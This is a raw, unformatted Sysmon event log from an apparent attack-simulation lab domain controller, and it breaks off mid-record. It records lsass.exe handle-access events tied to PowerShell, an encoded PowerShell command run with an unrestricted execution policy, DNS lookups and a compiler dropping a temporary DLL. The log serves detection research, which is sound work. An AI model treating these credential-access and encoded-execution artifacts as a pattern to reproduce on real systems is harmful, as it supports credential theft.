10341000x800000000000000097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.793{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8E18-6005-BD02-00000000A201}2340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.793{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8E18-6005-BD02-00000000A201}2340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.059{59A5CD1D-8E18-6005-BD02-00000000A201}2340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_qppsxx25.3ta.ps12021-01-18 13:33:14.059 10341000x800000000000000094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.043{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E18-6005-BD02-00000000A201}2340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:15.122{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:15.122{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:15.122{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:15.012{59A5CD1D-8E18-6005-BB02-00000000A201}42204684C:\Windows\system32\conhost.exe{59A5CD1D-8E1B-6005-BF02-00000000A201}4056C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:15.012{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:15.012{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:15.012{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:15.012{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:15.012{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:15.012{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:15.012{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:15.012{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:15.012{59A5CD1D-8C95-6005-0500-00000000A201}640764C:\Windows\system32\csrss.exe{59A5CD1D-8E1B-6005-BF02-00000000A201}4056C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:15.012{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.997{59A5CD1D-8E1A-6005-BE02-00000000A201}22644088C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E1B-6005-BF02-00000000A201}4056C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+955532a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+954a5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949b4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+94a12e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949e82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+954a5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949dac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949da232(wow64) 154100x8000000000000000115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:15.009{59A5CD1D-8E1B-6005-BF02-00000000A201}4056C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E18-6005-43DF-0F0000000000}0xfdf430HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{59A5CD1D-8E1A-6005-BE02-00000000A201}2264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 22542200x8000000000000000164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.873{59A5CD1D-8E15-6005-B802-00000000A201}456065.199.90.95.in-addr.arpa.0type: 12 ip5f5ac741.dynamic.kabel-deutschland.de;C:\Windows\sysmon64.exe 22542200x8000000000000000163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.482{59A5CD1D-8E15-6005-B802-00000000A201}456014.1.0.10.in-addr.arpa.0type: 12 win-dc-495.attackrange.local;C:\Windows\sysmon64.exe 11241100x8000000000000000162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:33:16.465{59A5CD1D-8E1C-6005-C002-00000000A201}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\4lax1uev.dll2021-01-18 13:33:16.294 10341000x8000000000000000161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.465{59A5CD1D-8E18-6005-BB02-00000000A201}42204684C:\Windows\system32\conhost.exe{59A5CD1D-8E1C-6005-C102-00000000A201}5000C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.465{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.